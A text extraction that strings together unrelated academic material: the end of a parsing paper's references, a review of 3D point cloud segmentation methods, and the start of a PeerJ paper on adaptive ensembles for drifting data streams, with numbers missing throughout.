conference on computational nat- ural language learning, conll-x ’ , pages – , stroudsburg, pa, usa. association for compu- tational linguistics. terry koo, xavier carreras, and michael collins. . simple semi-supervised dependency parsing. in pro- ceedings of the association for computational lin- guistics, pages – . association for computa- tional linguistics. john d. lafferty, andrew mccallum, and fernando c. n. pereira. . conditional random fields: proba- bilistic models for segmenting and labeling sequence data. in proceedings of the international conference on machine learning, icml ’ , pages – , san francisco, ca, usa. morgan kaufmann publishers inc. mitchell p. marcus, mary ann marcinkiewicz, and beat- rice santorini. . building a large annotated cor- pus of english: the penn treebank. computational linguistics., ( ): – , june. andré f. t. martins, miguel almeida, and noah a. smith. . turning on the turbo: fast third-order non-projective turbo parsers. in proceeding of the as- sociation for computational linguistics., pages – . andrew mccallum, dayne freitag, and fernando pereira. . maximum entropy markov models for information extraction and segmentation. in pro- ceedings of the international conference in machine learning., volume , pages – . vinod nair and geoffrey e. hinton. . rectified lin- ear units improve restricted boltzmann machines. in proceedings of the international conference on ma- chine learning., pages – . joakim nivre and mario scholz. . deterministic dependency parsing of english text. in proceedings of the international conference on computational lin- guistics., coling ’ , stroudsburg, pa, usa. asso- ciation for computational linguistics. joakim nivre, johan hall, sandra kübler, ryan mc- donald, jens nilsson, sebastian riedel, and deniz yuret. . the conll shared task on depen- dency parsing. in proceedings of the conll shared task session of emnlp-conll , pages – , prague, czech republic. association for computa- tional linguistics. joakim nivre. . algorithms for deterministic incre- mental dependency parsing. computational linguis- tics, ( ): – . stephane ross, geoffrey j. gordon, and j. andrew bagnell. . a reduction of imitation learning and structured prediction to no-regret online learning. journal of machine learning research – proceedings track, . kenji sagae and jun’ichi tsujii. . dependency pars- ing and domain adaptation with lr models and parser ensembles. in proceedings of the conll shared task in the joint conferences on empirical methods in natural language processing and computational natural language learning (emnlp-conll), pages – . ashish vaswani, yinggong zhao, victoria fossum, and david chiang. . decoding with large-scale neu- ral language models improves translation. in proceed- ings of empirical methods in natural language pro- cessing., pages – . citeseer. david weiss, chris alberti, michael collins, and slav petrov. . structured training for neural network transition-based parsing. in proceedings of the rd annual meeting of the association for computational linguistics and the th international joint conference on natural language processing (volume : long pa- pers), pages – , beijing, china, july. associa- tion for computational linguistics. hiroyasu yamada and yuji matsumoto. . statistical dependency analysis with support vector machines. in the th international workshop of parsing tech- nologies (iwpt ). majid yazdani and james henderson. . incre- mental recurrent neural network dependency parser with search-based discriminative training. in proceed- ings of the nineteenth conference on computational natural language learning, pages – , beijing, china, july. association for computational linguis- tics. yue zhang and stephen clark. . a tale of two parsers: investigating and combining graph-based and transition-based dependency parsing using beam- search. in proceedings of the conference on em- pirical methods in natural language processing, emnlp ’ , pages – , stroudsburg, pa, usa. association for computational linguistics. hao zhang and ryan mcdonald. . enforcing struc- tural diversity in cube-pruned dependency parsing. in proceedings of the association for computational lin- guistics, pages – . association for computa- tional linguistics. yue zhang and joakim nivre. . transition-based dependency parsing with rich non-local features. in proceedings of the th annual meeting of the asso- ciation for computational linguistics: human lan- guage technologies, pages – , portland, ore- gon. association for computational linguistics. kai zhao, james cross, and liang huang. . op- timal incremental parsing via best-first dynamic pro- gramming. in proceedings of the conference on empirical methods in natural language processing, pages – . paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - review of d point cloud data segmentation methods ruan xiaoyi school of computer science and engineering xi’an technological university xi’an, , china e-mail: @qq.com liu baolong school of computer science and engineering xi’an technological university xi’an, , china e-mail: liu.bao.long@hotmail.com abstract— d point cloud segmentation is one of the key steps in point cloud processing, which is the technology and process of dividing the point cloud data set into several specific regions with unique properties and proposing interesting targets. it has important applications in medical image processing, industrial inspection, cultural relic’s identification and d visualization. despite widespread use, point cloud segmenta- tion still faces many challenges because of uneven sampling density, high redundancy, and lack explicit structure of point cloud data. the main goal of this paper is to analyse the most popular algorithms and methodologies to segment point clouds. to facilitate analysis and summary, according to the principle of segmentation we divide the d point cloud segmentation methods into edge-based methods, region-based methods, graph-based methods, model-based methods, and machine learning-based methods. then analyze and discuss the advantages, disadvantages and application scenarios of these segmentation methods. for some algorithms the results of the segmentation and classification is shown. finally, we outline the issues that need to be addressed and important future research directions. keywords-line point cloud; segmentation; classification i. introduction image segmentation is one of the basic research directions of computer vision, and its purpose is to subdivide a digital image into multiple regions with similar properties[ ]. segmentation of d images has more than years of research history, but d point cloud data is a highly redundant and irregularly ordered structure, point cloud segmentation also faces many challenges. the segmentation of point clouds into foreground and background is a fundamental step in processing d point clouds. given the set of point clouds, the d point cloud segmentation can be defined with the sets: let the surface set },...,{ n ffff  reconstructed from the point set s, and the set },...,{ n rrrr  be a subset of the power set of s . each element in r is a set of point sets corresponding to a certain characterist- ic surface in f , which represents a region obtained by segmentation. if the following conditions are met, r is called a partition of the point set s : )  n i i sr   , indicates that the union of the divi-ded regions is the measured point set s , that is, each measurement point is divided into a certain region. )  ji rr Ø, indicates that the point sets obta- ined by segmentation do not intersect each other, and each measurement point cannot belong to two different regions at the same time. ) the points in each region have the same characteristics, and any two adjacent regions do not have the same characteristics. ) ),..., , ( nivi  , r are all connected regions. ii. methods summary we divide the d point cloud segmentation method into:edge-based methods, region-based methods, graph-based methods, model-based methods, and machine learning-based methods based on the basis of the current segmentation. a. edge-based methods the edge-based segmentation method is currently the most studied method[ ]. edges are the basic features that describe the shape of point cloud objects (figure ). the edge-based segmentation method first detects the geometric boundary points of the data points. the edge of the point cloud is usually composed of the normal vector of the point cloud or the boundary points with abrupt curvature. these boundary points international journal of advanced network, monitoring and controls volume , no. , are connected and then the entire data set is divided into the independent multiple point sets achieve the purpose of segmenting the point cloud. therefore, the edge detection technology is the key to edge-based segmentation. bhanu[ ] first used gradients to detect edges, fitting d lines to set points, and detecting changes in the direction of the unit normal vector on the surface. subsequently, jiang[ ] proposed a fast segmentation method using scanline grouping technology. the scan lines of the distance image are divided into curves and then they are clustered to represent the surface. this method is better than bhanu 's method in segmentation quality and running time , but it is not suitable for point clouds with uneven density. sappa[ ] proposed a new edge detection method. by performing edge detection on binary maps, extracting closed contours for fast segmentation; wang et al.[ ] proposed a fast point cloud edge detection algorithm. first, the point cloud data is grid-organized to exclude non-edge discrete points. finally, alphashapes judgment conditions are used to fficiently extract edges, which can effectively avoids the problem of extracting outer boundaries and holes. (a)original point cloud (b) the edge of data a. figure . point cloud and its edge the advantage of edge-based segmentation is that it has good segmentation results for data with strong contrast in different regions, and can detect the edges of different regions very intuitively. the disadvantage is that although it detects all the edges, it is difficult to determine the detection, the relationship between the edge of the target area and the boundary of the target area. in addition, such algorithms are very sensitive to noise and are not suitable for objects with smooth surface changes. b. area-based methods the region-based method classifies nearby points with similar attributes by searching for neighborhood information to achieve the purpose of segmentation. in zucker[ ] proposed a " region grow " should be split for d images, the researchers used after being d point cloud. the segmentation as shown in follows the figure . firstly, a small piece of seed region is given to the segmentation target, and the seed region is used as a starting point to search for the neighborhood; the curvature, normal vector, and geometric features of the point cloud are used as standards; if a point meets the criteria for seed growth, the point is incorporated into the seed region, and the process is repeated as a new seed point, until all points are detected, a growth region is formed. the segmentation results are shown in figure . however, this method has the problems of being easily affected by noise and easily causing the problem of segmentation holes and excessive segmen- tation. [ - ]. figure . area-based methods flow chart (a)original point cloud (b)segmented by region grow figure . example of region grow segmentation many scholars then the algorithm is improved. zhang[ ] use otsu determining the optimal segmetati- on threshold as a constraint condition of growth, better than the traditional segmentation methods, but is susceptible to noise; angelina et al.[ ] improved the region growing method with region merging and genetic algorithms, and its segmentation efficiency has been improved to some extent, but the boundary retention is poor; xiao et al.[ ] proposed clustering- international journal of advanced network, monitoring and controls volume , no. , based adaptive region growth for road image segmentation method, but its scope of application is limited; besl et al.[ ] divide the image into regions based on the curvature characteristics by calculating the gaussian and average curvature of the point cloud surface, set seed nodes for these regions, and then use polynomial simulation this method is highly suscep- tible to noise and is time-consuming; chen et al.[ ] calculated the ratio of the minimum eigenvalue of each point and the sum of the three eigenvalues by decom- posing the covariance matrix, and the ratio was minimum point as a seed point, the process is mainly used in the building plane extraction rule, the high cost of time; vosselman et al.[ ] use randomly selecting seed sampling points, is determined these seed point whether neighborhood can be fitted to a predetermined model, but the method is prone to false segmentation; koster[ ] using the generated information in a relatively irregular pyramid fig between the storage area, for comparing and merging adjacent regions; pu [ ] planar surface of the growth surface segmentation algorithm laser transactions; ning seats[ ] proposed a two-step method based on the coarse segmentation and fine segmentation, for extracting the main subject in the scene and finer details. the region-based method is more accurate than the edge-based method. for the seed method, the segmen- tation effect is directly related to the selection of the seed points. the quality of the seeds and the merge rules determine the segmentation effect, and this method is extremely susceptible to noise, causes over or under segmentation. c. model-based approach this method is based on geometric shapes such as spheres, cones, planes, and cylinders to group point clouds. according to these shapes, points with the same mathematical model will be divided into the same region. the most typical algorithm is fischer[ ] random sample consensus algorithm (ransac) and the improvement of the method. ransac achieves segmentation by detecting features with regular geome- tric shapes such as planes, spheres, and cylinders. the basic principle of the algorithm is to calculate the mathematical model parameters of the data based on a set of sample data sets containing abnormal data to obtain valid sample data. figure compares the least squares method with the ransac algorithm. the results are shown in noisy data in addition, ransac can more effectively fit the target. ransac is widely used in the extraction of building surfaces; li[ ] proposed an efficient ran- sac based algorithm on traditional ransac, which has good performance. noise immunity to segment millions of point clouds of a sample in less than a minute. hough transform the detection points into hough space[ ]. then a voting algorithm is used to detect objects with a specific shape, so that the problem of detecting arbitrary shapes is transformed into a statistical peak problem[ ], which is mostly used for the detection of circles and ellipses. document[ ] compared ransac and d hough transform results show d hough transform segment parameter values slower and more sensitive, ransac the detection result in the time segments and run more efficiently. however, when ransac is applied to plane detection, the “pseudo-plane” problem often occurs. to solve this problem, an improved ransac method[ ] based on normal distribution transfor-mation (ndt) units, which is accurate. the rate can reach more than . %, and the plane integrity exceeds . %. in most cases, the method based on model fitting it needs to provide the geometric model to be detected. zhang et al.[ ] provide a multi-model fitting method based on splitting and merging, which can eliminate the need to set the number of models in advance. in this case, automatic segmentation of point cloud is realized. (a) least squares fitting (b) ransac figure . comparison of least squares fitting and ransac the model-based method has pure mathematical principles, is fast and powerful, and has heterogeneity. the main limitation of this method is the inaccuracy of dealing with different point clouds. this method has been implemented in point cloud libraries based on various models based on lines, planes, circles, and so on. d. graph theory-based approach graph theory image segmentation uses the principle of graph segmentation to segment the point cloud. this type of algorithm models the point cloud into a graph model composed of nodes and edges that reflect the relationship between the nodes. graph theory-based optimal segmentation is typified by the fh algorithm proposed by felzensawalb and huttenloch[ ] . this method constructs a weighted undirected graph using point clouds as vertices, calculates rgb differences international journal of advanced network, monitoring and controls volume , no. , between different vertices to construct weights, and combines regions. chen[ ] achieves the goal of auto- matic segmentation by building a k-nearest neighbor graph, adding background constraints, and finding the minimum secant line. compared with several segmen- tation methods, the results show that this method is suitable for segmenting foreground and background, suitable for specified target extraction, or implementing multi-objective extraction in a supervised classification manner. ural et al.[ ] suppose that a conditional random field model exists, and use graph cut algorithm to disconnect part of the graph model to form indepen- dent regions according to the maximum posterior estimation criterion. li et al.[ ] proposed a progre- ssive form of a two-level optimal segmentation algorithm. first, the topological relationship and the distance measurement characteristics of points were calculated under the riemann geometry frame. the k- means clustering method was used to obtain the segmented voxels as the bottom layer. segmentation result. then, the voxels of the point cloud are modeled as nodes, the minimum spanning tree is constructed, and the high-level feature information of the nodes is extracted. the region segmentation effect of the point cloud details is obtained by using graph optimization. much of the work of graph-based methods has been invested in probabilistic inference models, such as the conditional random field (crf) method, which uses crfs to label points with different geometric surface primitives. graph theory-based methods can still efficiently segment point clouds in complex backgrounds, but these methods often lack real-time performance[ ]. e. machine learning-based methods machine learning treats point cloud segmentation as classifying point cloud data. yu[ ] proposed a neural network learning method that combines segmentation and classification simultaneously for target recognition;yang[ ] uses support vector machines to classify geometric features; guan et al.[ ] converts point clouds into voxels data to extract features and then use adaboost for training and target extraction; currently the most well-known is charles et al.[ ] use neural network for point set for d classification and segmentation-pointnet. although pointnet can discri- minate the type of object, it lacks robustness to noise and data. to solve this problem, charles et al. proposed pointnet++, which can extract local features at different scales and obtain deep features through a multilayer network structure. in addition, zhao et al. [ ] proposed a deep neural network model based on multi-scale features and pointnet for feature classifi- cation of lidar point cloud data in complex scenes. this method improves the local feature rxtraction of pointnet. ability to realize the automatic classification of lidar point clouds in complex scenes; niu[ ] improved the problem of the lack of local topological information of the generated features, and proposed a method that uses bisymmetric functions and spatial transformation networks to obtain more robust and stronger discrimination compared with pointnet++, the training time is reduced by % with the same accuracy. the advantages of machine learning-based methods are good classification results and high accuracy. but these algorithms require the training process large amounts of data have been tagged to do the training sample, and dividing the object is defined as the target has been trained, it is difficult to point to complete the modeling of the relationship, so that the algorithm is difficult to comprehensively promote. comparison of various point cloud segmentation methods is shown in table Ⅰ. table i. comparison of various point cloud segmentation methods segmentation methods advantage disadvantage edge-based methods can detect the edges of different areas very intuitively for point cloud. sensitive to noise and not suitable for objects with smooth surface changes. region-based methods more accurate than edge- based methods. the segmentation result depends on the quality of the seeds and the merging rules. there will be over- segmentation or under- segmentation. model-based methods fast segmentation speed, and heterogeneous,suitable for simple geometric models. difficult to use in complex scenarios. graph-based methods suitable for complex scenes. lack of real-time. machine learning- based methods. point cloud segmentation has high accuracy, good recognition effect. lack of real-time. international journal of advanced network, monitoring and controls volume , no. , iii. conclusion point cloud segmentation is a necessary link for target detection and d reconstruction. this paper investigates some classic point cloud segmentation methods and analyzes their advantages and disadvantages. as can be seen from this article, although point cloud segmentation has undergone a long period of research, there are still limitations. segmentation methods based on edges and regions have good real-time performance but are sensitive to noise, and the segmentation effect is often not ideal. the method based on model fitting has great limitations and it is difficult to adapt to the segmentation requirements of complex environments. although graph-based and machine learning-based methods can overcome noise and efficiently segment point cloud data, it is difficult to meet real-time system requirements. therefore, how to overcome the influence of noise and how to improve the real-time performance of the segmentation system is still the focus of point cloud segmentation research. acknowledgment the completion of this paper is inseparable from the patient guidance of prof. liu baolong, prof. chen hua, teacher wu qiong, and teacher lipeng si. i also thank other teachers and students in this laboratory for their help. finally, i would like to thank the science and technology program of weiyang district of xi'an city (project no.: ) for its fund support. references [ ] shapiro l, stockman g. computer vision prentice hall [j]. : ( ): - . [ ] luo xiping, tian jie, zhuge infants, and the like. summary of image segmentation [d]. . [ ] b. bhanu, s. lee, c. ho, and t. henderson, range data processing: representation of surfaces by edges [j]. in proc.int. pattern recognition conf. : - . [ ] xy jiang, h. bunke, and u. meier, fast range image segmentation using high-level segmentation primitives [j], in rd ieee workshop on applications of computer vision. . [ ] a. sappa, m. devy, fast range image segmentation by an edge detection strategy. in d digital imaging and modeling. . [ ] wang zongyue, ma hongchao, xu honggen, et al. research on water body contour extraction method based on lidar point cloud data [j]. wuhan university journal of information science. : - . [ ] zucker sw. regiorowing: childhood and adolescence [j], computer graphics and image processing. , ( ): - . [ ] li renzhong, liu yangyang, yang man, et al. d point cloud segmentation based on improved region growth [j]. chinese journal of optics, : - . [ ] gao f. cases of matlab image processing [m]. beijing: posts and telecommunications press, . [ ] zhang l, guo lm, he w, et al. an image segmentation algorithm based on maximal variance between-class and region growing [j] . information and electronic engineering. .: - [ ] angelina s, suresh lp, veni sh k. image segmentation based on genetic algorithm for region growth and region merging [c]. computing, electronics and electrical technologies, . [ ] xiao xiaoming, ma zhi, cai zixing, et al. an adaptive region growing algorithm for road segmentation [j]. control engineering, , ( ): . [ ] besl p j, jain r c. segmentation through variable-order surface fitting [j]. ieee transactions on pattern analysis and machine intelligence, , ( ): - . [ ] chen j, chen bq. architectural modeling from sparsely scanned range data [j]. international journal of computer vision, . [ ] vosselman g, gorte b g h, sithole g, et al. recognising structure in laser scanner point clouds[j]. international archives of photogrammetry, remote sensing and spatial information sciences, , ( ): - . [ ] koster k, spann m. mir: an approach to robust clustering- application to range image segmentation [j]. ieee transactions on pattern analysis and machine intelligence, , ( ): - . [ ] pu s, vosselman g. automatic extraction of building features from terrestrial laser scanning [j]. international archives of photogrammetry, remote sensing and spatial information sciences, , ( ): - . [ ] x. ning, x. zhang, y. wang, m. jaeger, segmentation of architecture shape information from d point cloud[j]. in vrcai, : - [ ] nguyen a, le b. d point cloud segmentation: a survey[c]. th ieee conference on robotics, automation and mechatronics (ram). ieee, . [ ] yan li, xie hong, hu xiaobin, et al. a new hybrid point cloud plane segmentation method [j]. journal of wuhan university (information science edition), : - . [ ] schnabel, ruwen. efficient ransac for point ‐ cloud shape detection [j]. computer graphics forum, , ( ): - . [ ] pvc hough ( ) method and means for recognizing complex patterns, us patent . [ ] tarsha-kurdi, fayez, tania landes, and pierre grussenmeyer. hough-transform and extended ransac algorithms for automatic detection of d building roof planes from lidar data [j], . [ ] li l, yang f, zhu h, et al. an improved ransac for d point cloud plane segmentation based on normal distribution transformation cells [j]. remote sensing, : - . [ ] zhang liangpei, z yun, c zhenzhong, et al. splitting and merging based multi-model fitting for point cloud segmentation. acta geodaetica et cartographica sinica, . [ ] felzenszwalb p f, huttenlocher d p. efficient graph-based image segmentation [j]. international journal of computer vision, , ( ): - . [ ] chen x, golovinskiy a, funkhouser t. a benchmark for d mesh segmentation [j]. acm transactions on graphics (tog), , ( ): - . [ ] ural s, shan j. min-cut based segmentation of airborne lidar point clouds[c]. international archives of the photogrammetry, remote sensing and spatial information sciences, xxxix-b . melbourne, australia:isprs, : - . [ ] li minglei, liu shaochuang, yang huan, etc. a two-level optimized lidar point cloud scene segmentation method. journal of surveying and mapping, , ( ): - . [ ] andoni a, indyk p. near-optimal hashing algorithms for approximate nearest neighbor in high dimensions[c]//proceedings of the th annual ieee symposium on foundations of computer science. berkeley, ca, usa: ieee, : - . [ ] yu yongtao, li j, guan haiyan, et al. learning hierarchical features for automated extraction of road markings from -d mobile lidar point clouds[j]. ieee journal of selected topics in international journal of advanced network, monitoring and controls volume , no. , applied earth observations and remote sensing, , ( ): – . [ ] pang guan, neumann u. training-based object recognition in cluttered d point clouds[c]. proceedings of international conference on d vision- dv . seattle, wa, usa: ieee, : - . [ ] yang bisheng, mei baoyan. research on d city model visualization [d]. . [ ] qi c r, su h, mo k, et al. pointnet: deep learning on point sets for d classification and segmentation[c]. proceedings of the ieee conference on computer vision and pattern recognition. : - . [ ] zhao zhongyang, cheng yinglei, shi xiaosong, et al. lidar point cloud feature classification method based on multi-scale features and pointnet [j]. progress in laser and optoelectronics, , ( ): . [ ] niu chengeng, liu yujie, li zongmin, et al. method of d target recognition and model segmentation based on point cloud data [j]. journal of graphics, , ( ): - . peerj-cs- .. classification of the drifting data streams using heterogeneous diversified dynamic class-weighted ensemble martin sarnovsky and michal kolarik department of cybernetics and artificial intelligence, faculty of electrical engineering and informatics, technical university in kosice, kosice, slovakia abstract data streams can be defined as the continuous stream of data coming from different sources and in different forms. streams are often very dynamic, and its underlying structure usually changes over time, which may result to a phenomenon called concept drift. when solving predictive problems using the streaming data, traditional machine learning models trained on historical data may become invalid when such changes occur. adaptive models equipped with mechanisms to reflect the changes in the data proved to be suitable to handle drifting streams. adaptive ensemble models represent a popular group of these methods used in classification of drifting data streams. in this paper, we present the heterogeneous adaptive ensemble model for the data streams classification, which utilizes the dynamic class weighting scheme and a mechanism to maintain the diversity of the ensemble members. our main objective was to design a model consisting of a heterogeneous group of base learners (naive bayes, k-nn, decision trees), with adaptive mechanism which besides the performance of the members also takes into an account the diversity of the ensemble. the model was experimentally evaluated on both real-world and synthetic datasets. we compared the presented model with other existing adaptive ensemble methods, both from the perspective of predictive performance and computational resource requirements. subjects algorithms and analysis of algorithms, data mining and machine learning, data science keywords ensemble learning, concept drift, data streams, adaptive ensemble introduction nowadays, the size of data is growing in a much faster fashion than in the past. information is being collected from household appliances, tools, mobile devices, vehicles, sensors, websites, social networks, and many other devices. an increasingly large number of organizations are starting to analyze large volumes of data, as the information obtained from these data can provide a competitive advantage over other businesses. data collection from devices is often continuous, and data come in the form of data streams. data stream classification is an active field of research, as more data sources can be considered as streaming data. when solving classification tasks using streaming data, the data generation process is not strictly stationary, and its underlying structure may change over time. the changes in the underlying data distribution within the streams may result in dynamic, non-stationary target concepts (gama et al., ; Žliobaite, ). how to cite this article sarnovsky m, kolarik m. . classification of the drifting data streams using heterogeneous diversified dynamic class-weighted ensemble. peerj comput. sci. :e doi . /peerj-cs. submitted november accepted march published april corresponding author martin sarnovsky, martin.sarnovsky@tuke.sk academic editor alberto cano additional information and declarations can be found on page doi . /peerj-cs. copyright sarnovsky and kolarik distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:martin.�sarnovsky@�tuke.�sk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ this phenomenon is called concept drift, and from the perspective of the training of classification models on the drifting data, the most crucial requirement is the ability of the model to adapt and incorporate new data into the model in order to react to potential changes (barddal et al., ). in concept drift, the adaptive learning algorithms are advanced machine learning methods that can reflect the changing concepts in data streams in real time. multiple approaches were proposed to extend the standard machine learning models with the ability to adapt to the changes in streams, including drift detectors (gonçalves et al., ; baena-garcía et al., ) and various sliding window techniques (bifet & gavaldà, ). ensemble models are a popular classification method, often providing better performance when compared to the standard machine learning models (breiman, , ; freund & schapire, ). when processing dynamic data streams, where the concepts change over time, dynamic adaptive ensembles present a suitable method that retains long-present historical concepts and covers newly appearing ones. ensemble methods proved to be capable of handling streaming data by updating its base learners (kolter & maloof, ; bifet et al., ; brzeziński & stefanowski, ; gomes et al., ) in either block-based, batch mode or instance-based, incremental mode. one of the crucial aspects of the ensemble classifiers for static data is to ensure the diversity of the base classifiers within the ensemble. in contrast to the diversity of the ensembles for the static data (carney & cunningham, ; kuncheva & whitaker, ), which is fairly well studied in the literature, there are fewer studies dealing with the ensemble’s diversity in the presence of concept drift (brzezinski & stefanowski, ; abassi, ). the main objective of the work presented in this paper is to present the design and implementation of a novel adaptive ensemble classification algorithm. the primary motivation of this study is to design a model capable of handling various types of drifts. the proposed method can be characterized as a heterogeneous, chunk-based approach that utilizes different types of base classifiers within the ensemble. the model also uses q statistic as a metric to measure the diversity between the ensemble members and dynamic weighting scheme. we assume that the creation of a heterogeneous ensemble consisting of different base learners with an adaptation mechanism that ensures the diversity of its members can lead to a robust ensemble that is able to handle the drifting data efficiently. to confirm these assumptions, we conducted an extensive experimental study, where we evaluated the proposed model performance on the selection of both real-world and synthetic, generated datasets with different types of concept drift. we also compared the proposed method to adaptive ensemble methods, including state-of-the-art adaptive ensembles. the main objective was to compare the performance of the methods using standard evaluation metrics, as well as training times and resource consumption. the paper is organized as follows. the background section provides basic definitions of the terms related to the data streams and the concept drift therein. the following section is dedicated to the state of the art in the area of the adaptive ensemble models used to handle the concept drift and defines the motivation for the presented approach. the following section describes the designed and implemented adaptive ensemble method. sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we then describe the datasets used in the experimental evaluation. the experimental results section summarizes the conducted experiments and achieved results. concluding remarks and possibilities for future work in this area are then summarized. background a data stream is defined as an ordered sequence of data items, which appear over time. data streams are usually unbounded and ordered sequences of the data elements hx ; x ; . . . ; xj; . . . ; i sequentially appearing from the stream source item by item (gama, aguilar-ruiz & klinkenberg, ). each stream element is generated using a probability distribution pj. the time interval between the particular elements on the stream may vary. particular data elements in the stream are usually of standard size, and most of the data streams are generated at high speed, e.g., the elements in the data streams appear rapidly. compared with static data, which is usually analyzed offline, data streams need to be analyzed in real time. the differences in the processing of the data streams compared to the processing of the static data can be summarized according to gama ( ): � the data elements in the stream arrive online or in batches. elements appearing online are processed one by one, and batches usually have the same size and are processed at once. � the processing system has no control over the order in which data elements appear, either within a data stream or across multiple data streams. � data streams are potentially unbound in size. the size of the particular elements is usually small. in contrast, the entire data size may be huge, and it is generally impossible to store the whole stream in memory. � once an element from a data stream has been processed, it is usually discarded. it cannot be retrieved unless it is explicitly stored in memory. the data streams can be divided into two groups: � stationary data streams—the data distribution does not change over time, e.g., the stream elements are generated from a fixed probability distribution; � non-stationary data streams—data are evolving, and the data distribution may change over time. usually, these changes may also affect the target concepts (classes). concept drift when solving predictive data analytical tasks on the static data, the data distribution usually does not change, and data used for the training and testing of the model have the same distribution. when processing the data streams, we often observe the changing nature of the data. in predictive data stream analytical tasks, we experience a phenomenon called concept drift. concept drift is related to the data distribution pt(x,y), where x ¼ ðx ; x . . . xnÞ is a data sample represented by an n-dimensional feature vector appearing at time t, and y sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ represents the target class. the concepts in the data are stable (or stationary) if all the data samples are generated with the same distribution. if there is an x in the interval between t and t + Δ, which holds the expression pt(x,y) ≠ pt + Δ(x,y), then concept drift is present (there is a change in the underlying data distribution) (Žliobaite, ). concept drift usually occurs in a non-stationary and dynamically changing environment, where the data distribution or relation between the input data and the target variable changes over time. the concept drift phenomenon may occur in various real-world data and corresponding applications (Žliobaite, pechenizkiy & gama, ): � computer systems or networks, through network intrusion detection, where new techniques and methods may appear (liu et al., ; mukkavilli & shetty, ); � industry, when dynamic data streams are produced by sensors in production equipment and machines (lin et al., ; zenisek, holzinger & affenzeller, ); � marketing and management, when users change their buying behavior and their preferences (black & hickey, ; chiang, wang & chu, ; lo et al., ); � medical data, e.g., in the case of antibiotic resistance (stiglic & kokol, ; tsymbal et al., ); � social networks, when users change their behavior and generated content (lifna & vijayalakshmi, ; li et al., ); � spam categorization, where spam keywords can change over time (delany et al., ; ruano-ordás, fdez-riverola & méndez, ). the authors in tsymbal ( ), Žliobaite ( ) and khamassi et al. ( ) describe a complex taxonomy of existing drift types. in general, there are several different types of concept drift, based on how the phenomenon occurs within the data stream: � sudden/abrupt—in this case, the concept change occurs suddenly. a concept (e.g., a target class) is suddenly replaced by another one. for example, in the topic modeling domain, the main topic of interest may unexpectedly switch to a different one. � incremental—changes in the data distribution are slower and proceed over time. changes are not as visible as in a sudden drift, but they gradually emerge. the changes are usually relatively slow and can be observed when comparing the data over more extended time periods. � gradual—in this drift type, both concepts are present, but over time, one of them decreases, while the other one increases. for example, such a change may reflect the evolution of points of interest, e.g., when a point of interest is gradually being replaced by a newer one. � re-occurring—a previously active concept reappears after some time. re-occurrence may appear in cycles or not (e.g., reappearing fashion trends). besides the mentioned drift types, some publications (gama et al., ) distinguish between two kinds of concept drift: real drift and virtual drift. virtual concept drift is defined by the changes in data distribution but does not affect the target concept. sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ real concept drift (also called concept shift) represents a change in the target concept, which may modify the decision boundaries. figure visualizes the drift types. in concept drift detection, it is also necessary to distinguish between the drift and outlier occurrence. outliers may produce false alarms when detecting the concept drift. when processing the non-stationary drifting streams, the necessary feature of the predictive algorithms is their ability to adapt. some of the algorithms are naturally incremental (e.g., naive bayes), while others require significant changes in the algorithm structure to enable incremental processing. therefore, the learning algorithms applied on the drifting streams are usually extended with a set of mechanisms, which enhance the models with the ability of continuously forgetting the obsolete learned concepts and updating the model with the newly arrived data in the stream. there are several types of models used to handle concept drift. to detect the concept drift in data streams, we can use drift detectors. these can detect possible concept drift by analyzing the incoming data or by monitoring the classifier performance. detectors process the signal from the data about changes in data stream distribution. drift detectors usually signalize drift occurrence and trigger the updating/replacement of the classifier. there are several drift detection methods available (gonçalves et al., ), and the drift detection method (ddm) (gama et al., ), the early drift detection method (eddm) (baena-garcía et al., ), and adwin (bifet & gavaldà, ) are the most popular. for predictive data modeling applied on the drifting streams, advanced adaptive supervised machine learning methods are used. supervised learning methods used for drifting stream classification could be categorized from several perspectives, depending on how they approach the adaptation (ditzler et al., ; krawczyk et al., ): � active/passive—active methods usually utilize drift detection methods to detect the drift and to trigger the model update. passive methods periodically update the model, without any knowledge of the drift occurrence. figure concept drift types according to gama et al. ( ). (a) sudden/abrupt, (b) incremental, (c) gradual, (d) re-occuring. full-size doi: . /peerj-cs. /fig- sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � chunk-based/online—chunk-based methods process the streaming data in batches (each batch consists of a specified fixed number of stream elements). online methods process the stream elements separately when they appear. ensemble models represent a popular solution for the classification of drifting data streams. an ensemble classification model is composed of a collection of classifiers (also called base learners, ensemble members, or experts) whose individual decisions are combined (most often by voting) to classify the new samples (sagi & rokach, ). the main idea of the ensemble model is based on the assumption that a set of classifiers together can achieve better performance than individual classifiers (kuncheva & whitaker, ). the selection of the ensemble experts is a crucial factor, as the ideal ensemble consists of a set of diverse base learners. ensemble models are also suitable for data stream classification, where target concepts change over time. the following section summarizes the use of ensembles in the classification of drifting streams. related work there are several approaches to the design of adaptive ensemble models. some of them use the same technique as approaches to static data processing, such as online boosting (wang & pineau, ), which is based on the classic boosting method, extended with online processing capabilities. for adaptation to concept drift, it uses concept drift detection. if a concept drift occurs, the entire model is discarded and replaced by a new model. another well-known model is the ozabagging (oza, ) ensemble. unlike bagging for static data, ozabagging does not use random sampling from the training data, but each of the samples is trained k times, which leads to a poisson distribution. further studies have focused on the design of the ensemble models that would be simple (in terms of their run time) and able to adapt to the concept drift dynamically. for example, the accuracy weighted ensemble (awe) (brzeziński & stefanowski, ) uses the assignment of weight to the base classifiers based on a prediction error. old and weak members are gradually being replaced by the new ones, with a lower error rate. the update mechanism is based on the assumption that the latest training chunk will better represent the current test chunk. another model, dynamic weighted majority (dwm) (kolter & maloof, ), dynamically changes the weights of the base classifiers in the case of incorrect classification. a new classifier is added if the model incorrectly classifies the training example, and old classifiers are discarded if their weights fall below a threshold value. online bagging and boosting algorithms were recently used as a basis for more advanced streaming ensembles, such as 